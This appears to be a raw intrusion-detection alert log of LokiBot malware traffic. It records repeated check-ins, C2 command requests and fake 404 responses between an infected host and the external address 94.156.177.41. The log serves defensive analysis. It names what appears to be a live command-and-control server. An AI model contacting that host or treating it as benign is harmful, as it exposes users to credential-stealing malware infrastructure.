2024-11-28T09:14:18.697511+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49707	94.156.177.41	80	TCP
2024-11-28T09:14:18.697511+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49707	94.156.177.41	80	TCP
2024-11-28T09:14:19.966495+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49707	94.156.177.41	80	TCP
2024-11-28T09:14:19.966495+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49707	94.156.177.41	80	TCP
2024-11-28T09:14:20.086493+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.7	49707	TCP
2024-11-28T09:14:20.351381+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49709	94.156.177.41	80	TCP
2024-11-28T09:14:20.351381+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49709	94.156.177.41	80	TCP
2024-11-28T09:14:20.351381+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49709	94.156.177.41	80	TCP
2024-11-28T09:14:21.741705+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49709	94.156.177.41	80	TCP
2024-11-28T09:14:21.741705+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49709	94.156.177.41	80	TCP
2024-11-28T09:14:21.861763+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.7	49709	TCP
2024-11-28T09:14:22.160780+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49710	94.156.177.41	80	TCP
2024-11-28T09:14:22.160780+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49710	94.156.177.41	80	TCP
2024-11-28T09:14:22.160780+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49710	94.156.177.41	80	TCP
2024-11-28T09:14:23.475744+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49710	94.156.177.41	80	TCP
2024-11-28T09:14:23.475744+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49710	94.156.177.41	80	TCP
2024-11-28T09:14:23.596377+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.7	49710	TCP
2024-11-28T09:14:23.860632+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49716	94.156.177.41	80	TCP
2024-11-28T09:14:23.860632+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49716	94.156.177.41	80	TCP
2024-11-28T09:14:23.860632+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49716	94.156.177.41	80	TCP
2024-11-28T09:14:25.137665+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49716	94.156.177.41	80	TCP
2024-11-28T09:14:25.137665+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49716	94.156.177.41	80	TCP
2024-11-28T09:14:25.257595+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.7	49716	TCP
2024-11-28T09:14:25.519659+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49722	94.156.177.41	80	TCP
2024-11-28T09:14:25.519659+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49722	94.156.177.41	80	TCP
2024-11-28T09:14:25.519659+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49722	94.156.177.41	80	TCP
2024-11-28T09:14:27.269118+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49722	94.156.177.41	80	TCP
2024-11-28T09:14:27.269118+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49722	94.156.177.41	80	TCP
2024-11-28T09:14:27.389087+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.7	49722	TCP
2024-11-28T09:14:27.668725+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49730	94.156.177.41	80	TCP
2024-11-28T09:14:27.668725+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49730	94.156.177.41	80	TCP
2024-11-28T09:14:27.668725+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49730	94.156.177.41	80	TCP
2024-11-28T09:14:28.997689+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49730	94.156.177.41	80	TCP
2024-11-28T09:14:28.997689+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49730	94.156.177.41	80	TCP
2024-11-28T09:14:29.117592+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.7	49730	TCP
2024-11-28T09:14:29.385370+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49733	94.156.177.41	80	TCP
2024-11-28T09:14:29.385370+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49733	94.156.177.41	80	TCP
2024-11-28T09:14:29.385370+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49733	94.156.177.41	80	TCP
2024-11-28T09:14:30.852920+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49733	94.156.177.41	80	TCP
2024-11-28T09:14:30.852920+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49733	94.156.177.41	80	TCP
2024-11-28T09:14:30.973009+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.7	49733	TCP
2024-11-28T09:14:31.235320+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49739	94.156.177.41	80	TCP
2024-11-28T09:14:31.235320+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49739	94.156.177.41	80	TCP
2024-11-28T09:14:31.235320+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49739	94.156.177.41	80	TCP
2024-11-28T09:14:32.658743+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49739	94.156.177.41	80	TCP
2024-11-28T09:14:32.658743+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49739	94.156.177.41	80	TCP
2024-11-28T09:14:32.778682+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.7	49739	TCP
2024-11-28T09:14:33.051469+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49745	94.156.177.41	80	TCP
2024-11-28T09:14:33.051469+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49745	94.156.177.41	80	TCP
2024-11-28T09:14:33.051469+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49745	94.156.177.41	80	TCP
2024-11-28T09:14:34.411968+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49745	94.156.177.41	80	TCP
2024-11-28T09:14:34.411968+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49745	94.156.177.41	80	TCP
2024-11-28T09:14:34.531967+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.7	49745	TCP
2024-11-28T09:14:34.797317+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49750	94.156.177.41	80	TCP
2024-11-28T09:14:34.797317+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49750	94.156.177.41	80	TCP
2024-11-28T09:14:34.797317+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49750	94.156.177.41	80	TCP
2024-11-28T09:14:36.257830+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49750	94.156.177.41	80	TCP
2024-11-28T09:14:36.257830+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49750	94.156.177.41	80	TCP
2024-11-28T09:14:36.377840+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.7	49750	TCP
2024-11-28T09:14:36.663456+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49755	94.156.177.41	80	TCP
2024-11-28T09:14:36.663456+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49755	94.156.177.41	80	TCP
2024-11-28T09:14:36.663456+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49755	94.156.177.41	80	TCP
2024-11-28T09:14:38.125230+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49755	94.156.177.41	80	TCP
2024-11-28T09:14:38.125230+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49755	94.156.177.41	80	TCP
2024-11-28T09:14:38.246285+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.7	49755	TCP
2024-11-28T09:14:38.518570+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49760	94.156.177.41	80	TCP
2024-11-28T09:14:38.518570+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49760	94.156.177.41	80	TCP
2024-11-28T09:14:38.518570+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49760	94.156.177.41	80	TCP
2024-11-28T09:14:39.946419+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49760	94.156.177.41	80	TCP
2024-11-28T09:14:39.946419+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49760	94.156.177.41	80	TCP
2024-11-28T09:14:40.066664+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.7	49760	TCP
2024-11-28T09:14:40.330195+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49764	94.156.177.41	80	TCP
2024-11-28T09:14:40.330195+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49764	94.156.177.41	80	TCP
2024-11-28T09:14:40.330195+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49764	94.156.177.41	80	TCP
2024-11-28T09:14:41.795444+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49764	94.156.177.41	80	TCP
2024-11-28T09:14:41.795444+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49764	94.156.177.41	80	TCP
2024-11-28T09:14:41.915448+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.7	49764	TCP
2024-11-28T09:14:42.534473+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49770	94.156.177.41	80	TCP
2024-11-28T09:14:42.534473+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49770	94.156.177.41	80	TCP
2024-11-28T09:14:42.534473+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49770	94.156.177.41	80	TCP
2024-11-28T09:14:43.957647+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49770	94.156.177.41	80	TCP
2024-11-28T09:14:43.957647+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49770	94.156.177.41	80	TCP
2024-11-28T09:14:44.077722+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.7	49770	TCP
2024-11-28T09:14:44.345691+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49775	94.156.177.41	80	TCP
2024-11-28T09:14:44.345691+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49775	94.156.177.41	80	TCP
2024-11-28T09:14:44.345691+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49775	94.156.177.41	80	TCP
2024-11-28T09:14:45.763443+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49775	94.156.177.41	80	TCP
2024-11-28T09:14:45.763443+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49775	94.156.177.41	80	TCP
2024-11-28T09:14:45.883417+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.7	49775	TCP
2024-11-28T09:14:46.159487+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49779	94.156.177.41	80	TCP
2024-11-28T09:14:46.159487+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49779	94.156.177.41	80	TCP
2024-11-28T09:14:46.159487+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49779	94.156.177.41	80	TCP
2024-11-28T09:14:47.672120+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49779	94.156.177.41	80	TCP
2024-11-28T09:14:47.672120+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49779	94.156.177.41	80	TCP
2024-11-28T09:14:47.792085+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.7	49779	TCP
2024-11-28T09:14:48.063766+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49785	94.156.177.41	80	TCP
2024-11-28T09:14:48.063766+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49785	94.156.177.41	80	TCP
2024-11-28T09:14:48.063766+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49785	94.156.177.41	80	TCP
2024-11-28T09:14:49.534406+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49785	94.156.177.41	80	TCP
2024-11-28T09:14:49.534406+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49785	94.156.177.41	80	TCP
2024-11-28T09:14:49.654366+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.7	49785	TCP
2024-11-28T09:14:49.922881+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49791	94.156.177.41	80	TCP
2024-11-28T09:14:49.922881+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49791	94.156.177.41	80	TCP
2024-11-28T09:14:49.922881+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49791	94.156.177.41	80	TCP
2024-11-28T09:14:51.346606+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49791	94.156.177.41	80	TCP
2024-11-28T09:14:51.346606+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49791	94.156.177.41	80	TCP
2024-11-28T09:14:51.466613+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.7	49791	TCP
2024-11-28T09:14:51.737036+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49795	94.156.177.41	80	TCP
2024-11-28T09:14:51.737036+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49795	94.156.177.41	80	TCP
2024-11-28T09:14:51.737036+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49795	94.156.177.41	80	TCP
2024-11-28T09:14:53.209909+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49795	94.156.177.41	80	TCP
2024-11-28T09:14:53.209909+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49795	94.156.177.41	80	TCP
2024-11-28T09:14:53.334685+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.7	49795	TCP
2024-11-28T09:14:53.691338+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49799	94.156.177.41	80	TCP
2024-11-28T09:14:53.691338+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49799	94.156.177.41	80	TCP
2024-11-28T09:14:53.691338+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49799	94.156.177.41	80	TCP
2024-11-28T09:14:55.171476+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49799	94.156.177.41	80	TCP
2024-11-28T09:14:55.171476+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49799	94.156.177.41	80	TCP
2024-11-28T09:14:55.291439+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.7	49799	TCP
2024-11-28T09:14:55.562437+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49804	94.156.177.41	80	TCP
2024-11-28T09:14:55.562437+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49804	94.156.177.41	80	TCP
2024-11-28T09:14:55.562437+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49804	94.156.177.41	80	TCP
2024-11-28T09:14:57.022105+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49804	94.156.177.41	80	TCP
2024-11-28T09:14:57.022105+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49804	94.156.177.41	80	TCP
2024-11-28T09:14:57.142377+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.7	49804	TCP
2024-11-28T09:14:57.414725+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49808	94.156.177.41	80	TCP
2024-11-28T09:14:57.414725+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49808	94.156.177.41	80	TCP
2024-11-28T09:14:57.414725+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49808	94.156.177.41	80	TCP
2024-11-28T09:14:58.886053+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49808	94.156.177.41	80	TCP
2024-11-28T09:14:58.886053+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49808	94.156.177.41	80	TCP
2024-11-28T09:14:59.006862+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.7	49808	TCP
2024-11-28T09:14:59.272741+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49814	94.156.177.41	80	TCP
2024-11-28T09:14:59.272741+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49814	94.156.177.41	80	TCP
2024-11-28T09:14:59.272741+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49814	94.156.177.41	80	TCP
2024-11-28T09:15:00.692482+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49814	94.156.177.41	80	TCP
2024-11-28T09:15:00.692482+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49814	94.156.177.41	80	TCP
2024-11-28T09:15:00.818473+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.7	49814	TCP
2024-11-28T09:15:01.091239+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49820	94.156.177.41	80	TCP
2024-11-28T09:15:01.091239+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49820	94.156.177.41	80	TCP
2024-11-28T09:15:01.091239+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49820	94.156.177.41	80	TCP
2024-11-28T09:15:02.364424+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49820	94.156.177.41	80	TCP
2024-11-28T09:15:02.364424+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49820	94.156.177.41	80	TCP
2024-11-28T09:15:02.484511+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.7	49820	TCP
2024-11-28T09:15:02.750976+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49823	94.156.177.41	80	TCP
2024-11-28T09:15:02.750976+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49823	94.156.177.41	80	TCP
2024-11-28T09:15:02.750976+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49823	94.156.177.41	80	TCP
2024-11-28T09:15:04.221399+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49823	94.156.177.41	80	TCP
2024-11-28T09:15:04.221399+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49823	94.156.177.41	80	TCP
2024-11-28T09:15:04.341290+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.7	49823	TCP
2024-11-28T09:15:04.611133+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49829	94.156.177.41	80	TCP
2024-11-28T09:15:04.611133+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49829	94.156.177.41	80	TCP
2024-11-28T09:15:04.611133+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49829	94.156.177.41	80	TCP
2024-11-28T09:15:06.031420+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49829	94.156.177.41	80	TCP
2024-11-28T09:15:06.031420+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49829	94.156.177.41	80	TCP
2024-11-28T09:15:06.156297+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.7	49829	TCP
2024-11-28T09:15:06.425627+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49833	94.156.177.41	80	TCP
2024-11-28T09:15:06.425627+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49833	94.156.177.41	80	TCP
2024-11-28T09:15:06.425627+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49833	94.156.177.41	80	TCP
2024-11-28T09:15:07.898325+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49833	94.156.177.41	80	TCP
2024-11-28T09:15:07.898325+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49833	94.156.177.41	80	TCP
2024-11-28T09:15:08.018341+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.7	49833	TCP
2024-11-28T09:15:08.283034+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49839	94.156.177.41	80	TCP
2024-11-28T09:15:08.283034+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49839	94.156.177.41	80	TCP
2024-11-28T09:15:08.283034+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49839	94.156.177.41	80	TCP
2024-11-28T09:15:09.702160+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49839	94.156.177.41	80	TCP
2024-11-28T09:15:09.702160+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49839	94.156.177.41	80	TCP
2024-11-28T09:15:09.822079+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.7	49839	TCP
2024-11-28T09:15:10.092587+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49844	94.156.177.41	80	TCP
2024-11-28T09:15:10.092587+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49844	94.156.177.41	80	TCP
2024-11-28T09:15:10.092587+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49844	94.156.177.41	80	TCP
2024-11-28T09:15:11.605394+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49844	94.156.177.41	80	TCP
2024-11-28T09:15:11.605394+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49844	94.156.177.41	80	TCP
2024-11-28T09:15:11.725316+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.7	49844	TCP
2024-11-28T09:15:11.986718+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49849	94.156.177.41	80	TCP
2024-11-28T09:15:11.986718+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49849	94.156.177.41	80	TCP
2024-11-28T09:15:11.986718+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49849	94.156.177.41	80	TCP
2024-11-28T09:15:13.478183+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49849	94.156.177.41	80	TCP
2024-11-28T09:15:13.478183+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49849	94.156.177.41	80	TCP
2024-11-28T09:15:13.598708+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.7	49849	TCP
2024-11-28T09:15:13.869864+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49854	94.156.177.41	80	TCP
2024-11-28T09:15:13.869864+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49854	94.156.177.41	80	TCP
2024-11-28T09:15:13.869864+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49854	94.156.177.41	80	TCP
2024-11-28T09:15:15.453442+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49854	94.156.177.41	80	TCP
2024-11-28T09:15:15.453442+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49854	94.156.177.41	80	TCP
2024-11-28T09:15:15.573387+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.7	49854	TCP
2024-11-28T09:15:15.847454+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49859	94.156.177.41	80	TCP
2024-11-28T09:15:15.847454+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49859	94.156.177.41	80	TCP
2024-11-28T09:15:15.847454+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49859	94.156.177.41	80	TCP
2024-11-28T09:15:17.303515+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49859	94.156.177.41	80	TCP
2024-11-28T09:15:17.303515+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49859	94.156.177.41	80	TCP
2024-11-28T09:15:17.427062+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.7	49859	TCP
2024-11-28T09:15:17.771783+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49864	94.156.177.41	80	TCP
2024-11-28T09:15:17.771783+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49864	94.156.177.41	80	TCP
2024-11-28T09:15:17.771783+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49864	94.156.177.41	80	TCP
2024-11-28T09:15:19.281950+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49864	94.156.177.41	80	TCP
2024-11-28T09:15:19.281950+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49864	94.156.177.41	80	TCP
2024-11-28T09:15:19.401939+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.7	49864	TCP
2024-11-28T09:15:19.671910+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49869	94.156.177.41	80	TCP
2024-11-28T09:15:19.671910+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49869	94.156.177.41	80	TCP
2024-11-28T09:15:19.671910+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49869	94.156.177.41	80	TCP
2024-11-28T09:15:21.096193+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49869	94.156.177.41	80	TCP
2024-11-28T09:15:21.096193+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49869	94.156.177.41	80	TCP
2024-11-28T09:15:21.216237+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.7	49869	TCP
